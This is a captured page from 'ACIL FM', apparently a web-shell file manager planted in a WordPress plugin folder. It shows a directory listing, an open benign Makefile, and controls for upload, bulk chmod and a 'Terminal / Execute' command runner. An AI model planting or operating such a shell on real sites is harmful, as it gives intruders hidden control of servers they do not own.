ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/otgs-installer-plugin/vendor/otgs/installer
/
home
mhhtmff
www
site
wp-content
plugins
otgs-installer-plugin
vendor
otgs
installer
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
dist
-
chmod
Open
Rename
Delete
includes
-
chmod
Open
Rename
Delete
locale
-
chmod
Open
Rename
Delete
res
-
chmod
Open
Rename
Delete
src
-
chmod
Open
Rename
Delete
templates
-
chmod
Open
Rename
Delete
installer.php
624 B
chmod
View
DL
Edit
Rename
Delete
loader.php
9.63 MB
chmod
View
DL
Edit
Rename
Delete
Makefile
1.24 MB
chmod
View
DL
Edit
Rename
Delete
phpcs.compatibility.xml
533 B
chmod
View
DL
Edit
Rename
Delete
phpcs.xml
2.85 MB
chmod
View
DL
Edit
Rename
Delete
phpunit.xml
644 B
chmod
View
DL
Edit
Rename
Delete
README.md
2.33 MB
chmod
View
DL
Edit
Rename
Delete
repositories.xml
1.15 MB
chmod
View
DL
Edit
Rename
Delete
webpack.config.js
2.47 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/otgs-installer-plugin/vendor/otgs/installer/Makefile
# Tutorial: http://www.cs.colby.edu/maxwell/courses/tutorials/maketutor/ # Docs: https://www.gnu.org/software/make/ .PHONY: precommit .PHONY: dupes comp jest phpunit test dev prod .PHONY: setup test setup:: vendor/autoload.php setup:: yarn.lock setup:: githooks #test:: jest test:: phpunit precommit:: validate-composer precommit:: validate-yarn precommit:: dupes precommit:: compatibility # precommit dupes: vendor/autoload.php ./.make/check-duplicates.sh compatibility: vendor/autoload.php ./.make/check-compatibility.sh validate-composer: composer.lock ./.make/check-composer.sh validate-yarn: yarn.lock ./.make/check-yarn.sh # Dependency managers ## Composer composer.lock: composer.json composer install touch $@ composer.json: composer init -q vendor/autoload.php: composer.lock composer install touch $@ ## Yarn yarn.lock: package.json yarn install touch $@ # Setup githooks: ifndef CI find .git/hooks -type l -exec rm {} \; find .githooks -type f -exec ln -sf ../../{} .git/hooks/ \; else echo 'Skipping in CI' endif # Tests jest: yarn.lock yarn run test phpunit: vendor/autoload.php vendor/bin/phpunit --fail-on-warning # Install install: composer install yarn install # Build dev prod: yarn.lock yarn run build:$@
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply